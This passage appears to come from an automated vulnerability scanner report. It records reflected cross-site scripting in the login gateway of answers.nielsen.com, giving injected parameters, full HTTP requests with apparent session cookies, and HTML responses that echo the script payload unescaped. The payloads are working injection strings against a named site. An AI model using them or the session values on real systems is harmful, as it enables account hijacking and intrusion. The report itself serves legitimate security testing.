class="ni-form-label-spacer"> </td> <td> </td> <td style="text-align:right;"> <a href="#" class="ni-btn-link" onMousedown="this.className='ni-btn-link-active';return false;" onMouseout="this.className='ni-btn-link';return false;" onMouseup="this.className='ni-btn-link';return false;" onClick="document.forms.login_form.submit()" ><span class="ni-btn-right-light"><span class="ni-btn-left-light"><span class="ni-btn-body-light">Login</span></span></span></a><input type="submit" value="submit" style="position:absolute;left:-2000px;"/> </td> </tr> </table> </form> </div> <div style="width:380px;margin:auto;"> <ul class="ni-unordered-list ni-uordered-list-chevron" style="width:inherit;margin-top:1px;padding-left:5px;"> <li> <a ..
Parameters
Parameter
Type
Value
TYPE
GET
33619969
REALMOID
GET
06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4
GUID
GET
SMAUTHREASON
GET
0
METHOD
GET
GET
SMAGENTNAME
GET
-SM-N/X3w2PnaN8cBlony5gQcMZ+2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ
TARGET
GET
-SM-HTTPS://answers.nielsen.com/portal/site/?'"----></style></script><script>netsparker(0x0006AF)</script>
Query Based
QUERYSTRING
'"--></style></script><script>alert(0x0006AF)</script>
Request
GET /gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-HTTPS%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2f%3f'%22----%3E%3C%2fstyle%3E%3C%2fscript%3E%3Cscript%3Enetsparker(0x0006AF)%3C%2fscript%3E HTTP/1.1 Referer: https://answers.nielsen.com/portal/site/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Cookie: answers_cookie=R868046967; GATEWAYSESSION=3pQsN68Ds9pFQn2lswbFflkzpJJRQQp9ZnnRFD2l4TGSvLLHtG4T!-271814052 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT,session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Date: Fri, 29 Apr 2011 18:00:04 GMT Server: Apache Cache-Control: no-cache="set-cookie" X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 <html> <head> <title>Nielsen Answers</title> <style> body, td { /* SET FONT FOR ALL BROWSERS */ font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } body, tr, .ni-heading1, .ni-heading2, .ni-heading3, .ni-heading4, .ni-definition-list, .ni-ordered-list, .ni-unordered-list, .ni-unordered-list-no-pad, .ni-body-text, .ni-body-text-2, .ni-form-label, .ni-error-text, .ni-footer { text-align: left; color: #7E7E7E; line-height: 1.6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } img { border: none; } .ni-link img, .ni-link .ni-img { border: none; } .ni-link, .ni-link:link, .ni-link:visited { color: #545763; font-weight: bold; text-decoration: none; } .ni-link2, .ni-link2:link, .ni_link2:visited { color: #00A2ED; text-decoration: none; } .ni-active, .ni-active:link, .ni-active:visited { color: #02A2EC } .ni-link:hover, .ni-link2:hover, .ni-active:hover { color: #43BAF1; } .ni-error, .ni-information, .ni-helptext { padding: 9px 9px 0; margin-bottom: 9px; background: white; } .ni-error { border: 1px solid red; color: #c00; } .ni-error-text { color: #c00; margin: 0 0 9px; } .ni-information, .ni-helptext { border: 1px solid #D7D8DC; background-color: #EFF0F2; } .ni-unordered-list, .ni-unordered-list ul, .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { list-style-type: square; font-weight: bold; padding: 0; color: #666; margin: 0 0 9px 19px; } .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { margin: 0 0 0px 19px; } .ni-unordered-list ul { margin-bottom: 0; margin-left: 13px; } .ni-unordered-list li { padding: 0px;; } .ni-uordered-list-chevron, .ni-uordered-list-chevron ul { list-style-type: none; margin: 0 0 9px 5px; } .ni-uordered-list-chevron li { background: transparent url("/gateway/images/answers_ui/ni-chevron.gif") no-repeat left 4px; padding-left: 15px; } .ni-uordered-list-chevron ul { margin-left: 0; } .ni-ordered-list, .ni-ordered-list ol { padding-left: 5px; margin: 0 0 9px 19px; } .ni-ordered-list ol { margin-bottom: 0; } .ni-definition-list { margin: 0; } .ni-definition-list dt { font-weight: bold; margin: 0; } .ni-definition-list dd { font-weight: normal; margin: 0; } .ni-heading1 { font-weight: bold; font-size: 20px; display: block; margin: 0 0 9px; line-height: 1.1; } .ni-heading2 { font-size: 16px; font-weight: normal; display: block; margin: 0 0 9px; line-height: 1.3; } .ni-heading3 { font-size: 12px; font-weight: bold; color: #666; display: block; margin: 0; } .ni-heading4 { font-size: 11px; font-weight: bold; color: #000; display: block; margin: 0 0 9px; } .ni-body-text { margin: 0 0 9px; font-weight: normal; } .ni-body-text-2 { margin: 0; font-weight: normal; } .ni-strong { font-weight: bold; } .ni-emphasis { font-weight: normal; font-style: italic; } .ni-heading4 { } .ni-hr { height: 1px; margin: 1.2em 0; background: #333; color: #333; border: 0; clear: both; } .ni-hr-2 { height: 1px; margin: .5em 0; background: #333; color: #333; border: 0; clear: both; } .ni-border-top { border-top: solid 1px #333 } .ni-br { width: 100%; clear: both; } /* Form Elements ---------------------------------------------------------*/ .ni-form { margin: 0; } .ni-form-table { margin: 0; } .ni-form-required { color: #F68421; } .ni-form-label { font-size: 11px; text-align: right; vertical-align: top; } .ni-form-label-t-left { font-size: 11px; text-align: left; vertical-align: middle; } .ni-form-label-v-middle { font-size: 11px; text-align: right; vertical-align: middle; } .ni-form-label-spacer { width: 6px; } .ni-form-element { vertical-align: top; } .ni-form-text-input { border: 1px solid #BDBEC1; background-color: #f5f5f6; padding: 2px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } .ni-form-text-input:focus { background-color: #ceedfc; } .ni-form-select { border: 1px solid #BDBEC1; background-color: #f5f5f6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } .ni-form-checkbox { width: auto; } .ni-form-textarea { padding: 1px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; border: 1px solid #BDBEC1; background-color: #f5f5f6; color: #333; } .ni-form-textarea:focus { background-color: #ceedfc; } .ni-form-file { border: 1px solid #BDBEC1; font-size: 11px; font-family: Arial, Helvetica, sans-serif; } .ni-form-disabled { background-color: #dcdcdc; } /* SIMPLE BUTTONS --------------------------------------------------------*/ .ni-btn { display: inline; width: auto; } .ni-btn input { background: #41BAF2; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#73CCF6',EndColorStr='#02A3ED'); color: white; font-weight: bold; font-size: 11px; border: 1px solid #0071BF; padding-top: 1px; padding-bottom: 1px; } .ni-btn-disabled input { background: #B5E4FA; border: 1px solid #5CC3F3; color: white !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#CFEEFC',EndColorStr='#96DDF9'); } .ni-btn-dark input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } .ni-btn-green input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } /* Table Elements --------------------------------------------------------*/ .ni-chrome-head { width:100%; } .ni-table { border: 1px solid black !important; border-collapse: collapse; clear: both; } .ni-row-head, .ni-row-head th { vertical-align: bottom; padding: 2px 7px; border: 1px solid #000; border-right: 1px solid #bebec0; border-left: 1px solid #bebec0; background-color: #eee; font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; } .ni-row-head-link, .ni-row-head-link:link, .ni-row-head-link:visited { font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; text-decoration: none; } .ni-row-head-link:hover { color: #43BAF1; } .ni-row-even, .ni-row-even td { background-color: #eee; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-row-odd, .ni-row-odd td { background-color: #fff; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-table-cell { vertical-align: middle; padding: 2px 7px; border: 1px solid #bebec0; color: #000; text-align: center; } table .ni-table-cell-left { text-align: left; } table .ni-table-cell-right { text-align: right; } table .ni-table-cell-center { text-align: center; } .ni-table .ni-link { font-weight: bold; color: #545763; } .ni-table .ni-user { font-weight: normal; } /* standard colored buttons ----------------------------------------------*/ .ni-btn-link, .ni-btn-link-active, .ni-btn-link-disabled { /*position: relative !important;*/ font: 11px arial, helvetica, sans-serif; font-weight: bold; text-decoration: none; line-height: 200%; *line-height: 100% !important; /*patch for ie6 problems*/ *vertical-align: 0px; *padding: 0; /*border: 1px solid green;*/ } /*active state*/ .ni-btn-link:active { background-position: 100% -75px; text-decoration: none; } .ni-btn-link-active { background-position: 100% -75px !important; } .ni-btn-link:active span { background-position: 100% -75px !important; text-decoration: none; } .ni-btn-link-active span { background-position: 100% -75px !important; } .ni-btn-link:active span span { background-position: 0 -75px !important; text-decoration: none; } .ni-btn-link-active span span { background-position: 0 -75px !important; } /*disabled state*/ .ni-btn-link-disabled { cursor:default !important; } .ni-btn-link-disabled { background-position: 100% -50px !important; } .ni-btn-link-disabled span { background-position: 100% -50px !important; } .ni-btn-link-disabled span span { background-position: 0 -50px !important; } /*hover state*/ .ni-btn-link:hover { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span span { background-position: 0 -25px; text-decoration: none; } /* light colored buttons ------------------------*/ .ni-btn-body-light { background: transparent url("/gateway/images/buttons/ni-btn-bg2.gif"); background-repeat: repeat-x; background-position: left top; padding: 3px 0px 5px 0px; height: 20px !important; display:inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-light { background-position: left -50px; } .ni-btn-left-light { background: transparent url("/gateway/images/buttons/ni-btn-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; cursor: hand; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-light { padding: 3px 0px 5px 5px; background-position: left -50px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-right-light { background: transparent url("/gateway/images/buttons/ni-btn-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; cursor: hand; *zoom: 1; /*hack for ie problems*/ *padding: 0px 5px 0px 0px !important; } .ni-btn-link-disabled .ni-btn-right-light { padding: 3px 5px 5px 0; background-position: right -50px; *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } /* dark colored buttons -------------------------*/ .ni-btn-body-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg2.gif") repeat-x left top; padding: 3px 0px 5px 0px; height: 20px !important; display: inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-dark { background-position: left -50px; } .ni-btn-left-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-dark { background-position: left -50px; } .ni-btn-right-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; *zoom: 1; /*hack for ie problems*/ *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } .ni-btn-link-disabled .ni-btn-right-dark { background-position: right -50px; } .ni-btn-left-cancel { background: url(/gateway/images/buttons/ni-btn-cancel-onblue.gif) no-repeat left top; padding: 3px 0px 5px 21px; *padding: 0px 0px 0px 21px !important; /*hack for ie problems*/ } /* These blocks are for displaying buttons -------------------------------*/ .white { padding: 20px 0; margin: 10px; background: #fff; border: 1px solid #999; overflow: hidden; } .blue { padding: 20px 0; margin: 10px; background: #A4DEF9; border: 1px solid #999; overflow: hidden; } /* Added new styles to display error messages in the Login page*/ .ni-logon-success-text { color: #009900 !important } .ni-logon-message-text { color: #0000ff !important } .ni-logon-body-text { color: #000000 !important } .ni-logon-error-text { color: #ff0000 !important } </style> <style> .ni-login-div{ height:101px; margin:70px 0px 0px 35px; *margin:70px 20px 0px auto; } </style> </head> <body> <table style="height:100%;width:100%;"> <tr> <td style="text-align:center;vertical-align:middle;"> <div style="width:380px;margin:auto;"> <table xmlns:fo="http://www.w3.org/1999/XSL/Format" border="0" cellspacing="0" cellpadding="0"></table> </div> <div style="border:1px solid #FFFFFF;height:189px;width:380px;margin:auto;background: transparent url('/gateway/images/answers_ui/bg_login.png') no-repeat left top;"> <form class="ni-form" action="/gateway/forms/login.fcc" method="post" name="login_form" AUTOCOMPLETE="ON" styleId="login_form"> <input type="hidden" name="realm" value="06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4"> <input type="hidden" name="target" value="HTTPS://answers.nielsen.com/portal/site/?'"--></style></script><script>netsparker(0x0006AF)</script>"> <input type="hidden" name="SMAUTHREASON" value="0"> <input type="hidden" name="password" value=" "> <table class="ni-form-table ni-login-div"> <tr></tr> <tr></tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Email:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:210px;" class="ni-form-text-input" id="logon" name="USER" type="text" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Password:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:100px;" class="ni-form-text-input" id="temp_password" name="PASSWORD" type="password" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label-spacer"> </td> <td> </td> <td style="text-align:right;"> <a href="#" class="ni-btn-link" onMousedown="this.className='ni-btn-link-active';return false;" onMouseout="this.className='ni-btn-link';return false;" onMouseup="this.className='ni-btn-link';return false;" onClick="document.forms.login_form.submit()" ><span class="ni-btn-right-light"><span class="ni-btn-left-light"><span class="ni-btn-body-light">Login</span></span></span></a><input type="submit" value="submit" style="position:absolute;left:-2000px;"/> </td> </tr> </table> </form> </div> <div style="width:380px;margin:auto;"> <ul class="ni-unordered-list ni-uordered-list-chevron" style="width:inherit;margin-top:1px;padding-left:5px;"> <..
Parameters
Parameter
Type
Value
TYPE
GET
33619969
REALMOID
GET
06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4
GUID
GET
3
SMAUTHREASON
GET
'"--></style></script><script>alert(0x000710)</script>
METHOD
GET
GET
SMAGENTNAME
GET
-SM-N/X3w2PnaN8cBlony5gQcMZ+2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ
TARGET
GET
-SM-https://answers.nielsen.com/portal/site/answers
Request
GET /gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=3&SMAUTHREASON='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000710)%3C/script%3E&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Cookie: answers_cookie=R868046967; GATEWAYSESSION=3pQsN68Ds9pFQn2lswbFflkzpJJRQQp9ZnnRFD2l4TGSvLLHtG4T!-271814052 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT,session_invalidated=; domain=.nielsen.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Date: Fri, 29 Apr 2011 18:00:12 GMT Server: Apache Cache-Control: no-cache="set-cookie" X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 <html> <head> <title>Nielsen Answers</title> <style> body, td { /* SET FONT FOR ALL BROWSERS */ font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } body, tr, .ni-heading1, .ni-heading2, .ni-heading3, .ni-heading4, .ni-definition-list, .ni-ordered-list, .ni-unordered-list, .ni-unordered-list-no-pad, .ni-body-text, .ni-body-text-2, .ni-form-label, .ni-error-text, .ni-footer { text-align: left; color: #7E7E7E; line-height: 1.6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } img { border: none; } .ni-link img, .ni-link .ni-img { border: none; } .ni-link, .ni-link:link, .ni-link:visited { color: #545763; font-weight: bold; text-decoration: none; } .ni-link2, .ni-link2:link, .ni_link2:visited { color: #00A2ED; text-decoration: none; } .ni-active, .ni-active:link, .ni-active:visited { color: #02A2EC } .ni-link:hover, .ni-link2:hover, .ni-active:hover { color: #43BAF1; } .ni-error, .ni-information, .ni-helptext { padding: 9px 9px 0; margin-bottom: 9px; background: white; } .ni-error { border: 1px solid red; color: #c00; } .ni-error-text { color: #c00; margin: 0 0 9px; } .ni-information, .ni-helptext { border: 1px solid #D7D8DC; background-color: #EFF0F2; } .ni-unordered-list, .ni-unordered-list ul, .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { list-style-type: square; font-weight: bold; padding: 0; color: #666; margin: 0 0 9px 19px; } .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { margin: 0 0 0px 19px; } .ni-unordered-list ul { margin-bottom: 0; margin-left: 13px; } .ni-unordered-list li { padding: 0px;; } .ni-uordered-list-chevron, .ni-uordered-list-chevron ul { list-style-type: none; margin: 0 0 9px 5px; } .ni-uordered-list-chevron li { background: transparent url("/gateway/images/answers_ui/ni-chevron.gif") no-repeat left 4px; padding-left: 15px; } .ni-uordered-list-chevron ul { margin-left: 0; } .ni-ordered-list, .ni-ordered-list ol { padding-left: 5px; margin: 0 0 9px 19px; } .ni-ordered-list ol { margin-bottom: 0; } .ni-definition-list { margin: 0; } .ni-definition-list dt { font-weight: bold; margin: 0; } .ni-definition-list dd { font-weight: normal; margin: 0; } .ni-heading1 { font-weight: bold; font-size: 20px; display: block; margin: 0 0 9px; line-height: 1.1; } .ni-heading2 { font-size: 16px; font-weight: normal; display: block; margin: 0 0 9px; line-height: 1.3; } .ni-heading3 { font-size: 12px; font-weight: bold; color: #666; display: block; margin: 0; } .ni-heading4 { font-size: 11px; font-weight: bold; color: #000; display: block; margin: 0 0 9px; } .ni-body-text { margin: 0 0 9px; font-weight: normal; } .ni-body-text-2 { margin: 0; font-weight: normal; } .ni-strong { font-weight: bold; } .ni-emphasis { font-weight: normal; font-style: italic; } .ni-heading4 { } .ni-hr { height: 1px; margin: 1.2em 0; background: #333; color: #333; border: 0; clear: both; } .ni-hr-2 { height: 1px; margin: .5em 0; background: #333; color: #333; border: 0; clear: both; } .ni-border-top { border-top: solid 1px #333 } .ni-br { width: 100%; clear: both; } /* Form Elements ---------------------------------------------------------*/ .ni-form { margin: 0; } .ni-form-table { margin: 0; } .ni-form-required { color: #F68421; } .ni-form-label { font-size: 11px; text-align: right; vertical-align: top; } .ni-form-label-t-left { font-size: 11px; text-align: left; vertical-align: middle; } .ni-form-label-v-middle { font-size: 11px; text-align: right; vertical-align: middle; } .ni-form-label-spacer { width: 6px; } .ni-form-element { vertical-align: top; } .ni-form-text-input { border: 1px solid #BDBEC1; background-color: #f5f5f6; padding: 2px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } .ni-form-text-input:focus { background-color: #ceedfc; } .ni-form-select { border: 1px solid #BDBEC1; background-color: #f5f5f6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } .ni-form-checkbox { width: auto; } .ni-form-textarea { padding: 1px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; border: 1px solid #BDBEC1; background-color: #f5f5f6; color: #333; } .ni-form-textarea:focus { background-color: #ceedfc; } .ni-form-file { border: 1px solid #BDBEC1; font-size: 11px; font-family: Arial, Helvetica, sans-serif; } .ni-form-disabled { background-color: #dcdcdc; } /* SIMPLE BUTTONS --------------------------------------------------------*/ .ni-btn { display: inline; width: auto; } .ni-btn input { background: #41BAF2; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#73CCF6',EndColorStr='#02A3ED'); color: white; font-weight: bold; font-size: 11px; border: 1px solid #0071BF; padding-top: 1px; padding-bottom: 1px; } .ni-btn-disabled input { background: #B5E4FA; border: 1px solid #5CC3F3; color: white !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#CFEEFC',EndColorStr='#96DDF9'); } .ni-btn-dark input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } .ni-btn-green input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } /* Table Elements --------------------------------------------------------*/ .ni-chrome-head { width:100%; } .ni-table { border: 1px solid black !important; border-collapse: collapse; clear: both; } .ni-row-head, .ni-row-head th { vertical-align: bottom; padding: 2px 7px; border: 1px solid #000; border-right: 1px solid #bebec0; border-left: 1px solid #bebec0; background-color: #eee; font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; } .ni-row-head-link, .ni-row-head-link:link, .ni-row-head-link:visited { font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; text-decoration: none; } .ni-row-head-link:hover { color: #43BAF1; } .ni-row-even, .ni-row-even td { background-color: #eee; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-row-odd, .ni-row-odd td { background-color: #fff; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-table-cell { vertical-align: middle; padding: 2px 7px; border: 1px solid #bebec0; color: #000; text-align: center; } table .ni-table-cell-left { text-align: left; } table .ni-table-cell-right { text-align: right; } table .ni-table-cell-center { text-align: center; } .ni-table .ni-link { font-weight: bold; color: #545763; } .ni-table .ni-user { font-weight: normal; } /* standard colored buttons ----------------------------------------------*/ .ni-btn-link, .ni-btn-link-active, .ni-btn-link-disabled { /*position: relative !important;*/ font: 11px arial, helvetica, sans-serif; font-weight: bold; text-decoration: none; line-height: 200%; *line-height: 100% !important; /*patch for ie6 problems*/ *vertical-align: 0px; *padding: 0; /*border: 1px solid green;*/ } /*active state*/ .ni-btn-link:active { background-position: 100% -75px; text-decoration: none; } .ni-btn-link-active { background-position: 100% -75px !important; } .ni-btn-link:active span { background-position: 100% -75px !important; text-decoration: none; } .ni-btn-link-active span { background-position: 100% -75px !important; } .ni-btn-link:active span span { background-position: 0 -75px !important; text-decoration: none; } .ni-btn-link-active span span { background-position: 0 -75px !important; } /*disabled state*/ .ni-btn-link-disabled { cursor:default !important; } .ni-btn-link-disabled { background-position: 100% -50px !important; } .ni-btn-link-disabled span { background-position: 100% -50px !important; } .ni-btn-link-disabled span span { background-position: 0 -50px !important; } /*hover state*/ .ni-btn-link:hover { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span span { background-position: 0 -25px; text-decoration: none; } /* light colored buttons ------------------------*/ .ni-btn-body-light { background: transparent url("/gateway/images/buttons/ni-btn-bg2.gif"); background-repeat: repeat-x; background-position: left top; padding: 3px 0px 5px 0px; height: 20px !important; display:inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-light { background-position: left -50px; } .ni-btn-left-light { background: transparent url("/gateway/images/buttons/ni-btn-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; cursor: hand; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-light { padding: 3px 0px 5px 5px; background-position: left -50px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-right-light { background: transparent url("/gateway/images/buttons/ni-btn-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; cursor: hand; *zoom: 1; /*hack for ie problems*/ *padding: 0px 5px 0px 0px !important; } .ni-btn-link-disabled .ni-btn-right-light { padding: 3px 5px 5px 0; background-position: right -50px; *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } /* dark colored buttons -------------------------*/ .ni-btn-body-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg2.gif") repeat-x left top; padding: 3px 0px 5px 0px; height: 20px !important; display: inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-dark { background-position: left -50px; } .ni-btn-left-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-dark { background-position: left -50px; } .ni-btn-right-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; *zoom: 1; /*hack for ie problems*/ *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } .ni-btn-link-disabled .ni-btn-right-dark { background-position: right -50px; } .ni-btn-left-cancel { background: url(/gateway/images/buttons/ni-btn-cancel-onblue.gif) no-repeat left top; padding: 3px 0px 5px 21px; *padding: 0px 0px 0px 21px !important; /*hack for ie problems*/ } /* These blocks are for displaying buttons -------------------------------*/ .white { padding: 20px 0; margin: 10px; background: #fff; border: 1px solid #999; overflow: hidden; } .blue { padding: 20px 0; margin: 10px; background: #A4DEF9; border: 1px solid #999; overflow: hidden; } /* Added new styles to display error messages in the Login page*/ .ni-logon-success-text { color: #009900 !important } .ni-logon-message-text { color: #0000ff !important } .ni-logon-body-text { color: #000000 !important } .ni-logon-error-text { color: #ff0000 !important } </style> <style> .ni-login-div{ height:101px; margin:70px 0px 0px 35px; *margin:70px 20px 0px auto; } </style> </head> <body> <table style="height:100%;width:100%;"> <tr> <td style="text-align:center;vertical-align:middle;"> <div style="width:380px;margin:auto;"> <table xmlns:fo="http://www.w3.org/1999/XSL/Format" border="0" cellspacing="0" cellpadding="0"></table> </div> <div style="border:1px solid #FFFFFF;height:189px;width:380px;margin:auto;background: transparent url('/gateway/images/answers_ui/bg_login.png') no-repeat left top;"> <form class="ni-form" action="/gateway/forms/login.fcc" method="post" name="login_form" AUTOCOMPLETE="ON" styleId="login_form"> <input type="hidden" name="realm" value="06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4"> <input type="hidden" name="target" value="https://answers.nielsen.com/portal/site/answers"> <input type="hidden" name="SMAUTHREASON" value="'"--></style></script><script>netsparker(0x000710)</script>"> <input type="hidden" name="password" value=" "> <table class="ni-form-table ni-login-div"> <tr></tr> <tr></tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Email:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:210px;" class="ni-form-text-input" id="logon" name="USER" type="text" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Password:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:100px;" class="ni-form-text-input" id="temp_password" name="PASSWORD" type="password" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label-spacer"> </td> <td> </td> <td style="text-align:right;"> <a href="#" class="ni-btn-link" onMousedown="this.className='ni-btn-link-active';return false;" onMouseout="this.className='ni-btn-link';return false;" onMouseup="this.className='ni-btn-link';return false;" onClick="document.forms.login_form.submit()" ><span class="ni-btn-right-light"><span class="ni-btn-left-light"><span class="ni-btn-body-light">Login</span></span></span></a><input type="submit" value="submit" style="position:absolute;left:-2000px;"/> </td> </tr> </table> </form> </div> <div style="width:380px;margin:auto;"> <ul class="ni-unordered-list ni-uordered-list-chevron" style="width:inherit;margin-top:1px;padding-left:5px;"> ..
Parameters
Parameter
Type
Value
TYPE
GET
33619969
REALMOID
GET
06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4
GUID
GET
3
SMAUTHREASON
GET
0
METHOD
GET
GET
SMAGENTNAME
GET
-SM-N/X3w2PnaN8cBlony5gQcMZ+2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ
TARGET
GET
'"--></style></script><script>alert(0x000766)</script>
Request
